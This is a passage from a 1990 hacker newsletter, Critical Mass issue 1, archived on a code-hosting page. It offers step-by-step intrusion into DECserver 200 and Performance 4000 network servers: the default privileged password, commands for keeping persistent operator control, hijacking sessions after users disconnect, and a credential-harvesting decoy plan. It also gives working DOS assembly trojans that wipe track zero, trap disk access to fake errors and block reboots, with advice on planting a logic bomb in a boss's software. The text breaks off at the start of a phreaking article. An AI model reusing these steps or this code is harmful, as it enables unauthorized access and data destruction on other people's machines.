informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/magazines/CRITICAL/critical.1st

2688 lines
136 KiB
Plaintext
Raw Blame History

_____________________________________________________________________________
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
\ Critical Issue # 01 A Technical Text /
\ Mass ~~~~~~~~~~~ File Newsletter. /
\________________________________|____________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__________________________
__________ l___________ | ___________l
// \ _______ _____ l|l _____ ______ ___
// /~~~~~~~\_\ l \ l l l|l l l // \ _ l l
// / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l
<<<< ritical l / l l l|l l l // / / \ l l
\\ \ l < l l l|l l l <<<< / ___ \ l l
\\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____
\__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l
==--> ==-->
____ __ ____ ==--> (09/09/90)
l \ / l ass ==-->
l \ / l __ ______ ______
l \ / l / \ / \ / \ A Technical
l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ Text File Newsletter
l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~
l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 1
l l l l /_/ \_\ /~~~~ / /~~~~ /
~~~~ ~~~~ ~~~~~~ ~~~~~~
_____________________________________________________________________________
l Writters l Special thanks to.... l
l__________________________l________________________________________________l
l l l
l The Beaver l The Baron (For info and a place for TLH area) l
l BIOC AGENT l (hackers to call .................) l
l Mark Tabas l Pink Floyd (Same as above....................) l
l l l
l l Cool Breeze, The Highwayman, Rowag, and all l
l l former members of Chaos Control, Copy Cat l
l l (excluding Doug Ferrell), and Special Forces. l
l l Also, Gator off of UF EitherNet, Mentilist, l
l l The Nut-Kracker ,The Sysop of the Hurrican l
l l Hole, and the sysop of Warriers Retreat. l
l__________________________l________________________________________________l
* Note: We, the writters and editors, of this text newsletter are not
respossible for any injuries or prosecutions due to the information
giving in this text.
EXPERIMENT AT YOUR OWN RISK!
Anybody who is willing, can submit an article! If you wish to
submit an article, please e-mail either 'The Beaver' or the 'Nut-
Kracker', via the 'Warriers Retreat' (904)422-3606. Also, All
sysops can freely download this text in the terms that it is not
altered and none of the credits are change. So.................
please act like a human! Also, for your convience,
every now and then a 'volume' of the Critical Mass is
created. That is, after three to five issues (roughly 50k to 70k
of text) a compiled text will be made containing the past issues,
so if you have missed any issues,you can download the volume you need.
In order for this text to keep on being produced, you the reader
needs to submit, either it be by asking questions (Which will
sometime be included in the text) or by submitting and article.
Any articles on Hacking, Fone Phreaking, Credit Card Surfing,
Pirating, Chemistry, etc. our welcome. Any general 'not accepted'
material is accepted here! Articles can be on anything from 'how
to rip off this type of coke machine' to 'how to build a Axis bomb
from spare car parts'. We hope you enjoy the information given and
find some use for it.
/\
/\/\ Chief Editors Brought To You By
/\/\/\ ~~~~~~~~~~~~~ Members of
/\/\/\/\ The Beaver (SC/HA)
/\/\/\/\/\ The Nut-Kracker
/\/\/\/\/\/\
/\/Critical\/\
\/\/\Mass/\/\/ (SC/HA)
\/\/\/\/\/\/
\/\/\/\/\/
\/\/\/\/
\/\/\/
\/\/
\/
______________________________________________________________________________
l This issue contains articles of the following..... l
l____________________________________________________________________________l
l l
l I - Editorial about Critical mass, written by 'The Beaver' l
l II - Hacker DEC200 and Preformance 4000 networks, written by 'The Beaver'l
l III - Destructive Viruses, Trojans, etc for your IBM PC!, by 'The Beaver' l
l IV - Basic Telecomunication, written by 'BIOC AGENT' l
l V - Better Homes and B-Boxing, written by Mark Tabas(c) C.C.C l
l VI - Virus Scare, written by 'The Beaver' for Online Magazine. l
l VII - Virus Storys, written by 'The Beaver', for Online Magazine. l
l____________________________________________________________________________l
____________________________________________________________________________
l I. Editorial: What is Critical Mass? l
l Written By 'The Beaver' l
l__________________________________________________________________________l
I have been involved with telecomunications via modem since the age
of 13. I'm now currently 18, and still telecommunicating strong. Over the
years I have seen many changes in telecommunications in my area. When I
first started using a modem, I quickly noticed the free exchange of information
on various bulletin boards in my town. People know as 'hackers','fone phreaks',
and 'pirates' constantly exchange information. This is not the case now. All
the old boards have closed down, and the 'modem police' have arrived setting
examples for other bulletin boards in our town, except for an extreme few.
Now it seems that ever conversion on every board, except for two that I can
think of, is along the lines of 'Gee, hi bob, hows the wife and kids?'. I
usually think to myself 'WHO THE HELL CARES?' and 'Gee, it would be nice
to know of several BBS's in my town that you could comunicate freely, and
not be kicked off. I don't mean that every BBS in town, you should be able
to post up other peoples credit card numbers, but at least be a little open
minded. Well before this starts to sound like the Nut-Krackers NFSA text,
I will get to the point of why this text newsletter was created. I have
lately, as stated earlier, noticed a null in the coversions on the local
area BBS's along with a null of comunication between the hackers, pirates,
fone phreaks, etc in our area. One reason I feel is that the there aren't
that many local area hackers left along with pirates and fone phreaks (At
least fone phreaks have a reason for going a little bit under, that is
because of AT&T equipment replacing) is because the methods, and traditions
, along with basic information was never pasted on. I mean how many people
out there can honestly say that they could tell the difference between a
ANI and a customer loop in telefone terms? Can YOU set up a decoy to hack
into a system? How about a trojan horse? Can you write a virus, or have
you even seen one in action? Or maybe the question is do you care. If
your a human, odds are you do have at least a small bit of intrest. This
is who technology increases. Can you honestly tell me that computer securitys
methods would not have tight'in up if hackers, fone phreaks, virus creators,
and trojan horse creators, had never exsisted. Im not trying to imply that
it is 'ok' to create a virus, but do you really think that by not discussing
the matter and not getting information is going to help? Of course not. Any
programer who has the urge to destroy your system will do so. So basicly,
this text was written to get the young hacker/fone phreak/pirate started. If
you do not like it, so sue me. After all, it is completely legal to write
and discuss and ,yes, give detail information out on these and other issues,
so no, your not a criminal for simply downloading this text. That choice
is made when you decide how you would like to use the information given......
As for myself, I bet you can guess how I use alot of the information given.
At any rate, take it for what it worth, and I hope you enjoy the text, and
the others to follow!!! Well, lets cut the editorial short, and get some
information flowing.
______________________________________________________________________________
l II. Hacking DEC200 and Preforance 4000 network Servers l
l Written By 'The Beaver' l
l Part I l
l____________________________________________________________________________l
After vigerous, and intensive research by myself and The Nut-Kracker
(Members of SC/HA - Sterling Cracking/Hacking Association), this article was
written and contains information never disclosed in another text files,
newsletter, etc, to the best of our knowlege.
The DECserver 200 and Preformance 4000 is a popular networking
equipment used by anything from coporations to universitys system. We did
most of our 'research' illegally on the dozens of ethier networks off of
FIRN (Florida Information Resource Network (904)488-0650 - (904)488-0657) and
Tymnet. We have pretty much wore out our welcome on FIRN, but if you care to,
you can test some of the information given in this article out on some of
the DECserver 200 and Preformance 4000's on FIRN. Who knows, you may strike
it lucky!!
Basic commands by nonprivileged access.
First off, on DECsevers and Performance 4000 you are either a
privileged user or a non-privileged user. As a privileged user, you may use
commands that no normal user can use. As a privileged user, you can logout
users, set up services, initilize the system, changes the servers
charateristics, and much, much more, but first you must be know how to use
some of the more basic nonprivileged commands and you must no some of the more
basic terms. The commands with the `*`. beside them sometimes require that you
are privileged. This all depends on the servers charateristics. The short
hand for each command is written beside the commands.
Commands Terms
--------------- ----------------------
*Show users - Sho u Inactivity Timer
Show ports - Sho por Keepalive Timer
Show ports (#) - Sho por (#) Init Timer
Broadcast port - Bro por (#) Console port
*Show server - Sho serv
*Show nodes - Sho no
Connect (name) - c (service name)
Most of these commands are explain themself, but lets lets explain
them anyway.........
Commands.
-----------------------------------------------------------------------------
Show Users - Does exactly as it states, show all the users and shows
what services they are connected to.
Show Port - Shows all the charateristics of the port you are
currently connected too.
Show port (#) - Shows a specific port charateristics that can be other
than the port your own port. It can also be in the form
of 'sho por all'. This will show on a DECsever 200 all
the ports charateristics. On a performace 4000, it will
show all the ports and there current states. That is,
if they are 'connected','idle' or are in 'local' mode.
To get this effect on a DECserver 200, you type 'sho
por all brief'.
Broadcast port (#) - This will send a message to a specific port. On DECserver
200's, it poses a problem because you can interrupt a
command. So, when your typing a command and someone sends
you a message, it interrupts the command and you have to
re-type it. On Performance 4000's, this does not happen.
Show Server - Shows the servers charateristics. It shows the console
port, keepalive timers, inactivity timers, etc, of that
server.
Show Nodes - Show services that are not currently up in the service
list. Any nodes that are not in the service list is
not reachable by non-privileged users.
Connect - self explanitory
Terms
-------------------------------------------------------------------------------
Inactivity Timer - Logs ports out if no activities or connections are
created. It is usually set to 30 minutes. Thats its
default.
Keepalive Timer - Keep a port active when any illegal logout has been
done. This is usually set to 30 minutes. This is also
its default.
Init Timer - Show when the next initilization of the server will take
place. When a initilization happens, everything is
back to its default and all counters are reset to
zero. (*Note: Sometimes a you can type 'show counters'
to see there values.)
Console port - The main port where privileged is usually set under. On
a initilization, all information of the server is dumped
to the console port.
If you would like to get more help on commands or would like to learn
more commands, type 'help' at the local prompt of and DEC made server. Here
are somemore commands you need to know under a privileged port. The
non-privileged commands will still work on a privileged port. Heres the list
of what is covered.
Command list
------------------------------------------------------------------------------
Set server password (password) - set serve pass (0-32 chr$)
Set inactivity (enabled/disabled) - set inact (e/d)
Set keepalive (enabled/disabled) - set keep (e/d)
Set interrupt (enabled/disabled) - set inter (e/d)
Logout port (#) - lo por (#)
Set service (service name) (enabled/disabled) - set servi (name) (e/d)
zero (service name) - z (name)
Set node (node name) (enabled/disabled) - (none)
Commands
------------------------------------------------------------------------------
Set server password - This is used to change the privileged password. If
you care to remain a network operator, then DON'T
CHANGE IT! There are usually no logs kept of people
who have logged in, so you can stay privileged for
a LOOOOONNNNNGGGGGG time.
Set inactivity - This sets the inactivity timer. If a user is not
doing anything on a network, he will be logged out.
By disabling it, you will never be logged out for
not doing anything.
Set keepalive - This keeps 'alive' a port if it is logged out. Not
to be confused with the inactivity timer. This keeps
a session active after logoffs.
Set interrupt - This makes it so that you can 'interrupt' sessions
to broadcast a message. You can set your interrupts
as a non-privileged user, but you can't set other
peoples interrupts. To set some other port besides
your port , you would type 'set inter por (#) enabled'.
Logout port (#) - With non-privileged access you just type 'lo' or
'logout', but with a privileged access you can logout
other members on the network. If you want to play with
being a network operator, then don't do this. I only
did it when I was busted by another user, and then
I wouldn't let them back on the network while I was
on.
Set service - This disables/enables so other user can use them.
You can also disable services for specific ports
like thus, 'set servi (service name) por (#) disabled'.
Zero (Name) - This takes down services (fake or real, explained
later on) and takes them off the service the service
list and puts them in the node list (if there real
services) to where non-privileged users cannot access
them.
Set node - This command sets up 'nodes' as 'services' so you
access them. Sometimes in the node list, there are
sometimes nodes nobody is allowed to have access to.
This changes that. You can also set up nodes so only
certain ports can access them by typing 'set node
(node name) por (#) (enabled/disabled). Actually there
is probably a short hand way of doing this, but I
remember the format. Its probably something like 'set
no', or 'set nod'.
Ok, now that we have discussed some basic terms and operations (thanks
to all the people who know all this, and had to bare through it) now we can
talk about basic hacking information.
DECserver and 4000 Default password.
On most DECserver and 4000's, when the network is set up, the operator
is given a default password. That is, the are given a password that all DEC
servers and 4000's are given. It is the network operator that must change it,
but the majority they leave it as there default. Beside 'who would want to hack
a network sever anyway?'. Actually, there are many, many advantages in hacking
network servers. I have only been on two DECserver 200 that had already change
there default before I got there. Thats out of 14 servers. Hell thats a 2:14
ratio! I got into a companys network in boston via tymnet using a default!!
The odds that the default hasn't been changed! My guess is that since the
network doesn't have to be accessed as an operator, and since the network
pretty much runs itself, nobody really notices whats going on on the the
net. I advise that the first thing you do 'define' the password. That is,
when you 'set' a function, it is only set till you logout, but if you define
a function, it will change it the next time the system is initilized. You see,
if you set the servers password, then it is set for that call, but as soon
as you disconnect it is changed back to its original value. If you define
it, it will change only when the server is initilized. So as soon as you
get on, set the inactivity to disabled, so you have as much time as you want
to play with the system, and type.......
define serv password system
If you got the network operations password by some other means, then
replace the word 'system' with the password you got in under. This command
will only work if you are already privileged, natually. To become privileged
you type.....
set privileged (*Short hand:set priv)
password: (used the default first, and you will probably have access as network
operations)
so........type......
password:system
After this, define it as the password you got in on. The reason is
that most servers automaticly initilizes itself, so if you caught, in a
month or so, when the system is initilize, the password will change back to
the old password you got in under! Odds are that they won't notice for months!
Everytime you get access on the system after you get kicked off, repeat this
process. My guess would be that you can stay as a network operator for 6 months
to a year by getting caught or not!
Setting up loops
Loops can be used for a varity of reasons, if it be security or for
the 'fallinf in' method. Here is an example of a loop. We'll call the nets
A, B, and C. The first example will use only A and B. For this example we
will say that all these are DECserver 200's just to keep to simple. Let me
note that it doesn't have to be only a DEC200 that loops will work on. These
have been choose to keep the example simple......Heres the first, starting
at A.
DEC 'A' --------------------> DEC 'B' --l
l l l
l l<----------------------------------l
l
l----------------------------> To Your desired service.
Here's the second.......
DEC 'A' -------------------> DEC 'B' --l
l
---- DEC 'C' <----------------l
l
l------------------> To your desired service.
If you are caught by a system operators under a loop, they will be lead
all over the network (you can loop as many times as you like). The one
problem I found with loops was that there is a delay in transmissions of data
because of all the networks it is being sent though. I usually don't worry to
much about loops, but it can be handy for falling in (mentioned later in text).
Heres two example of what loops would look like if you started at A.........
DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
Please type HELP if you need assistance
Local>connect B
Session established to B
DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
Please type HELP if you need assistance
Local>connect A
Session established to A
DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
Local>(from here your looped once, yuo can either do this process again or
continue from here)
Heres an example of the secound example........
DECserver 2000 Terminal Server V2.0 (BL29) - LAT V5.1
Please type HELP if you need assistance
Local>connect B
Session established to B
DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
Please type HELP if you need assistance
Local>connect C
Etc,Etc, They may not look to different, but they are........
(Note:You do not have to be privileged to preform a loop)
Falling in Behind users.....
This method is good for getting a 'peek' at a system you need to want
to get into. If a witty programer uses this method, he may be able to set up
a trojan horse, but the problem is is that when you logout under an account
that you 'fall in' behind, you will more than likely to be never be able to
get in on that account ever again. Let me explain. On networks, when you
log on from a certain region, you will get the same port always, unless that
port is already taken, in which you are re-routed to a port that is open.
Above I explained the opertation of the keepalive timer, this is where we take
advantage of it. Lets say, in theory, you call (or routed via another network
) to a DECserver (either it be a DEC200 or 4000) as somebody illegally logged
out, by say, hanging up without typing 'logout' or what not. As they logout
, the keepalive timer keeps there session open and active. If by luck you
happen to get the port just as they logout (within the timers limits), you
would fall into there session. That is, the keepalive timer keeps the session
they logged out under and you go on right as they hang up and instead of
getting the DECserver you get another prompt of they system that was perviously
being used. Believe it or not, this can happen. Both with luck and skill. I
have had this happen several times not knowing what happened, but still the
odds are against you. You will be happy to know that with a little skill,
patents and using loops, this can be done. The only problem is, as I stated
before, is that when you logout, you lose that account. One time I used this
method and found myself on a VAX under VMS. I was under someones account using
someones password. The easy part is finding the username your under, but you
still don't have the password! So, Im sitting in this system and I think
'hey, no big deal, I will change the password so that I can use it for several
days?'. What I had forgotten was that it asks for the old password in order
to change it to a new one. It does get frustrating to be sitting inside of
a system and know the secound you disconnect, its gone, but you can gain alot
still. If you try to change the password, your back to password hacking again.
Let me attempt to explain what happens and how to use this method. In order
to understand, you must understand loops.......the example networks I will
use is A and B, we will make them both DEC preformance 4000's in this case
(*Note: it is not always nessasary for them to be DEC servers)
We will start at network A first. This method is easier if you are
accessed as a privileged user. If you are privileged, the first thing you
want to do is set you inactivity to disabled so you have plenty of time. If
you don't, the don't worry about this. Now you need to show you port (sho por)
to see what port your in, after this write down what the results where. Now
we start the loop. Now we would connect to B. When we got onto B we would
show the port again and write down the results again. Next we would connect
back to port A again (we will be under a different port) and show the port
again and write down the results. From here we would logout of A and now
be put on B. It would be extremely helpful to set your inactivity to disabled
here also. Now re-connect to A again , and write down the port you in. You
should be on the same port you logged into the first time unless someone has
logged onto the port before you. Thats why I suggest you do this late at night
when nobody is on yet. Now we know what port you always get logged into
from B to A. Now you wait till someone logs onto the port you always get on
when you login from B to A. To do this, log back onto A every once and a while
and check your port. If you get logged onto a port a different port, show the
users and see who is on your port, and what they are connected too. Now we
wait even more and do some praying inbetween. We pray that the user will
illegally logout. This is common, because normal users find it a hassle to
type in 'logout' so usually they will simply hang up. When someone does
finnally log onto the port you always get, we wait and simply log onto A from
B and see if where in. If we are not, then we sho the users to make sure
the user hasn't properly logout. Heres what happens graphicly..........
User --------- DEC A ---------------- To Session
Us --------> DEC A -------> DEC B ------l
l l
l<------------------------l
In this case it didn't work.... Heres when it does work.......
User l-> DEC A ----------------- To Sesion
l
l------------ DEC B
l
Us --------> DEC A ------>l
Confusing Huh?, if this didn't cover it to where you can understand
E-mail me and I will gladly answer any questions...........
A Trap Door......
On A DEC server, The Nut-Kracker and I hit ona trap door (also called
a back door). Actually , it is an error in the DECserver software. Im not sure
if it works on Preformance 4000's but on some DECservers that are working on
a VAX that also runs other operations, it does seem to work. What happened
was that I was on a DEC200 and I wasn't to worried about lossing privileged
access. So I set myself up as a network operator and began re-initilizing
the system. I noticed that there was a console port so I begain to get help
on setting up ports as consoles. It told me that if I were a ture console that
it would give me a downline dump of all data on the server. Well naturally I
wasn intrested in this dump, just to see what it would give me. So I set my
port up as a console (set console port (#) enabled) and proceeded
initializing the system. It didn't send me a down line dump but instead booted
me off! I tried to reconnect several times, but it wouldn't let me do so until
about two minutes later, but instead of getting a local prompt I got a '$'
prompt which told me I was pobably in someones VMS in a VAX. I was under fairly
good access but under no username that I could find, so there for I did not
exsist! I logout and tried this process again and it did the same thing. Here's
my theory of what happened. I was on Fla. Atlanitic Univ. at the time and I
had noticed that in the services that a system called 'KOALA' was avaliable.
Evidently the network I was operating off of was also run on that VAX but it
was also being used for other things as well. When I re-inited the system,
instead of putting me back on the network, it threw me into the VAX! I can't
promise that this will work on all DEC200, cause it depends on what it is
running on I imagine. One problem I saw was that when you re-init the network,
the staff the next morning will notice. So there is a sacrifice, but from what
I saw, I was a VERY high level user on that VAX. So it may be worth the risk.
Often I notice that if you initialize a network once, the network staff will
think nothing of it, but if you keep on doing it they will.
Setting up decoys.
I cannot be sure of this, but I it MAY be possible to set up a decoy
via DECservers. A decoy operates like this, you make a user think he is calling
something he is not and give the user a password prompt and a username prompt.
When the user types it in, it is set to you. Usually you say something like
'Password invalid' every time he trys it then on the third you kick him
off you decoy and set up the real service. Im not sure if it can be done, but I
have a feeling it can. I was attempting to setup a decoy on a companys system
in boston via Tymnet when they caught me and booted me off. Evidently, they
thought I was such a major threat that they change the network name (I accessed
it through Tymnet 904-878-2267 in the Tallahassee reigon) so that it would
make it tons harder to access it again. I got to the point to where I could set
up services that didn't exsist and make them look like they where 'avaliable'.
I could even set up services that were not even on the node name list! I set
up a service as 'Beaver' stated that it was 'Avaliable' and gave it an
identifier of 'this is a test'. After this I spent an hour trying to get it
down before the morning came around and people started to show up for work!
I did finnally get it down though. Here was my original plan. I was going to
take down a service and put it in the nodes list. After this, I was going to
create a fake service under the same name. When someone 'connected' or at
least they thought, it would send me the username and password. I may have
been able to do this through the 'announcement' command, but Im not sure.
As I said, I never got past the setting up false services stage, but you may
get more lucky than I was. You can only do this through privileged access
though. If you anyone does ever setup a actual decoy, PLEASE notify me. If
you ever get the chance, see if it can be done. There are BIG, BIG uses of
decoys! If you do get the chance, get some help on 'zero','set services',
'set nodes'. If you need any assistance, contact a memeber of the SC/HA
If you care to play with any (Digital Equipment Corp.) DEC either
nets, heres a couple of places you can go VIA FIRN (Florida Information
Resourse Network). All the ones given have THE most slack security I have
ever seen in my life. Odds are, you will run into I, or the Nut-Kracker.
There are may other Florida area hackers running around on this net. When the
first time I logged onto FIRN I thought it was the lamest net I had ever gotten
on, be actually it is a fun place to play. Through FIRN you can access BITNET,
DOE (Dept. of Education), just about all major universities of florida and
some not so major, all sorts of networks, FSU cybers, in-out modems, and
MUCH, MUCH more. Please, if you go on, set you interrupt to disabled except
for the ones where the '*' is where it really don't matter. If you see me,
send me a message! (bro por # 'msg. here)
Straight through FIRN (904)488-0650 through (904)488-0657
* SERDC eithernet
Though Univ. Fla Eithernet. (UF)
Call 200 (DEC200)
Call 250 (DEC200) sometimes not up.
Call 201 (Prefor.4000)
Call 202 (Prefor.4000)
*Call 1000 (Select 'VAX')(DEC200)
*Call 3000 (DEC200)
_____________________________________________________________________
l III. Destructive Programs for your IBM PC. l
l Written by 'The Beaver' l
l___________________________________________________________________l
This artical is the first part of a series, hopefully. We will deal with
destructive programs for you IBM PC computer. Actually, the tittle of this
artical is a little inacurate, because of the fact that I intend on adding in
some code for those Commodore 64\128 users out there also. But first, we will
go right into IBM programs to start off with.
First off you are going to have to now a few things. A destructive
program can be written in about any language. We will be dealing in everything
from BASIC programing to Assembly. All the code in Assembly can be entered
through a program that all PC users get when the get MSDOS for there computer. T
hat program is 'DEBUG'.
How To Use Debug As A Assembler.
--------------------------------
All of you that are experienced in Assembling with Debug are just going
to have to bare though this. Sorry.
To start out, what you are going to need is a processor that can save in
pure ASC form. This can be a word processor or through Edlin. If you are not
use to using Edlin, simply refer to your MSDOS user manual. Its not that hard
to understand. Anything that can save in pure ASC form will do just fine. We
are going to be making files with a 'COM.' extention, but first lets get a
little bit of understanding of the registers. The microprocessor in you IBM
has serveral bytes of its own memory, divided into 14 areas called registers.
The computer uses these registers to keep track of what is going on. The only
real inportant register is the one that keeps track of the number of bytes
being written in our case. To display the registers, you type 'r':
-r
Debug will respond with the names and contents of these registers. Like
Thus......
AX=xxxx BX=xxxx CX=0000 DX=xxxx SP=xxxx BP=xxxx SI=xxxx DI=xxxx
DS=xxxx ES=xxxx SS=xxxx CS=xxxx IP=xxxx IP=xxxx NV UP EI PL NZ PO NC
xxxx:0100 xx xxxx
Luckly, not all these registers need to be explained. The only important
register it the one with the '0000' after it, or CX. This controls how many
bytes are to be written. To change a register we would type....
r (name of the register)
Or, in are case to change the number of bytes to write, you would type.
r cx
It would respond with something like
CX 003E
:
At the ':' you would type the number of bytes to write in hexidecimal. If
you do not know HEX. then look it up in a computer book of some kind. This is
also not hard information to find. Now, I know you may be saying, 'what the
hell are you talking about, but don't fret, it will become more clear. Now,
from here, I will just use examples...... Lets say you have the following
Assembly code. We will say this is the code.
mov ah,1
mov cx,10c
int 10
int 20
We would break out a word processor and type the following
a 100 ( Tells Debug to Assemble )
mov ah,1
mov cx,10c
int 10
int 20
( You MUST have a space here, in order for it to work )
r cx ( A debug command, as I mentioned above )
9 ( We will be writting 9 bytes, this is the new value of CX )
n first.com ( This tells debug what to name the file as )
w ( Write the debug file )
q ( Quit debug )
Now remember, this is all enter through a wordprocessor. Do try to write
this in debug. Now we will save the completely text file as 'first.scr'
Ok, now copy debug to the disk with the text file above on it. Next you would
type the following.........
debug <first.scr
( DOS should repond with )
-a 100
xxxx:0100 mov ah,1
xxxx:0102 mov cx,10c
xxxx:0105 int 10
xxxx:0109 int 20
-r cx
:9
-n first.com
-w
Writting 0009 bytes
-q
C>
All this should happen automaticly. You type nothing. I know this is
all pretty sketchy details, but I do not wish to make this into a 'how to use
Debug' text file. If you have any problems, e-mail me or get a copy of
Supercharged MSDOS by Van Wolverton, printed by Microsoft press. If you did get
the thing to work and understand somewhat, the cursor after you ran this COM.
file should have got bigger. If it didn't then either you don't understand as
well as you think or you typed it in wrong.
How To Destroy Disk Drives
----------------------------
OK, enough dilly dally and one with the artical. The following has
been set up for YOU the user to experiment. I will explain as I go along, I
also intend on explaining what to look for if you think a program is
a destructive one. Ok, this assembly code........
mov ah,05
mov dl,00
mov dh,00
mov ch,00
mov cl,01
mov al,08
int 13
mov ah,00
mov 21
Now let me explain this code some. This is a trojan horse. Actually it dosn't
destroy the disk drive in a physical mannor, but it actually destroys tracks
zero or the disk, thus making it unusable by DOS. While you can still use a
floppy drive after it has formatted yuor software, this is NOT true for a
hard drive. If you notice the line that states 'mov dl,00', this sets that
drive to drive A. If this is changed you can risk your hard drive. The only
thing you destroy when DL is left at 00 is the disk in drive A, but is you
change the number to the hard drive, it WILL DESTROY YOUR HARD DRIVE MAKING
IT UNUSABLE, and you have to get it reformatted by the manufacter. Lets now
examine the code....
Load AH with a five means format track.
mov ah,05
DL contains the drive number. In this case it is drive A (0=A)
mov dl,00
DD contains the head number. This is zero.
mov dh,00
CH is the track number. As I said earlier, this is zero.
mov ch,00
CL contains the sector number. Here it is sector one.
mov cl,01
AL contains the number of sectors to be processed. There are eight sectors to
one track, so we say...
mov al,08
This is a Interupt 13. This is a BIOS interrupt for disk access.
int 13
And the program is ended with a interrupt 21
mov ah,00
int 21
So what this small assembly code does is simply wipe out track zero
thus making the disk unusable by DOS. As I said before, don't attempt this on
your hard drive unless you don't like it. Now building on the code above, we
can also accomplish another thing. The code up top simply moves the heads to
track zero and wipe out all eight sectors. It basicly reformats track one. The
next bit of code doesn't do this, but rather moves the heads of the drive past
the innermost track. This is done because on some disk drives, the heads will
seize up and the drive must be taken apart to get to them to free them. This
only works on some drives though. This s done by telling the computer to move
the heads past track 39. The code looks like this......
mov ah,05
mov dl,00
mov dh,00
mov ch,80
mov cl,01
mov ah,08
int 13
mov ah,00
int 21
Remember that 'ch' tell the computer what track to go to. Note its
value. It is also possible to even destroy monitors by reprograming the 6845
CRT controller from what I understand, but I have not yet obtained the code
or tried to figure it out. I like my monitor to much I guess. At any rate, all
the code given here is set for drive A. If you still remember, 'DL' contains
your device drive you wish to use. If you also remember, '00' is for drive A.
Here are the rest for you to use at your disposal......
00 - A
01 - B
02 - C
You could have probably guessed that, huh?
False errors.
----------------------------------
Ok, all the stuff covered so far is good trojan horse material, but
lets go into logic bombs for a moment. Im going to take it that we are all
use to hearing this term and move on. Creating false errors are good in several
ways. They can cause a user to go nuts with his system and also cause no
damage to the computer, unless the user gets so mad he beats his machine to
death. False errors are just what they sound like; errors that shouldn't be
happening. If this code is used, you can add it into a program, thus creating a
hassling logic bomb. Take for example..... Lets say that I have added some
code into a word processor to create false errors with the disk drive on
November 21 and any day after that, and I exchange this program for my bosses
word processing program, or hell, I add it straight onto his word processor.
Now my boss, we'll call him 'Mr.Dick' comes to work, ok? Now his computer
works great up till November 21, right? Now lets say that November 21 rolls
around and on this day he writes a long report. Now when he tries to save his
report, all he can get are errors. He loses everything, right, because he can't
save the data. Mr.Dick decides to take apart his computer to have it fixed, but
there is nothing wrong. He tries the software again, but it still doesn't work.
So Mr.Dick goes completely insane and kills all of his family and is locked up.
Well, I doubt it would go that far but at any rate heres some code.......
This code fucks with the disk drive.......
mov ah,35
mov al,04
int 21
mov ax,es
mov dx,bx
mov ds,ax
mov ah,25
mov al,13
int 21
mov ax,00
int 21
Heres a simple explantion.....Interrupt vector four (overflow) is read.
mov ah,35
mov al,04
int 21
Interrrupt vector 13 (dsk access) ir redirected to vertor vector four. Since
this interrupt is not defined, the dsk. interrupt is not serviced.
mov ax,es
mov dx,bx
mov ds,ax
mov ah,25
mov al,13
int 21
The program is ended with a interrupt 21.
mov ax,00
int 21
So basicly all disk accesses are trapped. The errors you get depend on the
buffer size in your CONFIG.SYS file. This can be done with all sorts of devices
without much effort. Heres another one for you disk drive. This one triples
the load time........
mov ax,0000
mov ds,ax
mov bx,0522 (Parameter Address)
mov ah,ff (The step rate)
mov [bx],ah
xor ax,ax
int 13
mov,00
int 21
Well this is probably enough for simulated errors, so onward.
Simulated Crashes.
------------------------------------
This has always been a classic for the logic bomb. The thing thats is
the most difficult about simulated crashes is that it is hard to redirect the
Alt-Ctrl-Del function. This is a small program that can do this, and this one
is a handy one also. I will explain..........Here's the code.........
mov ah,35
mov al,04
int 21
mov ax,es
mov dx,bx
mov ds,ax
mov ah,25
mov al,09
int 21
mov ax,0000
int 21
After you run this program, you will see that in order for you to
regain control over the keyboard, you must turn off the computer. The good
thing about this is that lets say we have a trojan horse, and we would like to
make sure the user won't stop it, you could use this program. As an example,
punch in this code and save it as 'nostop.com'. Now create a batch file with
the following.........
Nostop
dir *.*
dir *.*/p
Not that once the batch file is started, you can't stop it, not even
with a warm boot. You must turn off the computer. Now if a trojan horse is
started with this first, it can't be stoped. On some peoples systems, they may
have uninterruptable power supplys, thus, even when they turn the system off,
the program (trojan) keeps going!
Well, before I end this file, I would like to state something to all
the Commodore users out there. You know, us Commie users (yes, I have one too)
have a big problem in writting trojans. It is so noticable when the heads start
to bang when formatting, so you never get to far. Also, it is total hell to
write a virus on also. So here are to hints for you guys..... As you may or
may not know, when a disk is verified, all files with the extention 'USR' are
wiped out. Really! Look it up in your manual! A good method for a trojan on
the Commie is to write a small program that does this ( the program must look
big though. This is to explain the disk access time ). Have the program change
all files to USR files, then have it veryify the disk. This will keep the heads
from knocking and will kill everything. Also, heres another hint, read the next
issue of Critical Mass, because I intent to include part two of the
'Destructive Programs For You IBM PC'. In part two, these are the topics to
be discussed............
Part II
---------
Simple Data Munipulation.
A Virus for your Commodore 64/128
Three viruses for you IBM
How to make a text file into a trojan horse.
What to look for in deadly files and how to protect yourelf
Hopefully we will get all that in the next issue. If you have any
insults, questions, threats or comments, please e-mail `The Beaver` at the
place at the end of this text.......Till then Chow......
---==<Beaver>==---
The following file was written many years(1983) ago about basic telefone
hacking. It would be my guess that the fone numbers given are no good what so
ever, but ANI and Customer Loops are still in use. So for your reading
enjoyment, I through BIOC AGENTS text file in after alot of editing.
IV *******BIOC AGENT 003'S COURSE IN*******
-- ** =BASIC TELECOMMUNICATIONS= **
** PART II **
****************************************
*PREFACE:IN PART II, WE WILL EXPLORE THE VARIOUS SPECIAL BELL #'S, SUCH AS:
CN/A, AT&T NEWSLINES, LOOPS, 99XX #'S, ANI,RINGBACK, AND A FEW
OTHERS.CN/A:-----CN/A, WHICH STANDS FOR CUSTOMER NAME AND ADDRESS, ARE BUREAUS
THAT EXIST SO THAT AUTHORIZED BELL EMPLOYEES CAN FIND OUT THE NAME AND ADDRESS
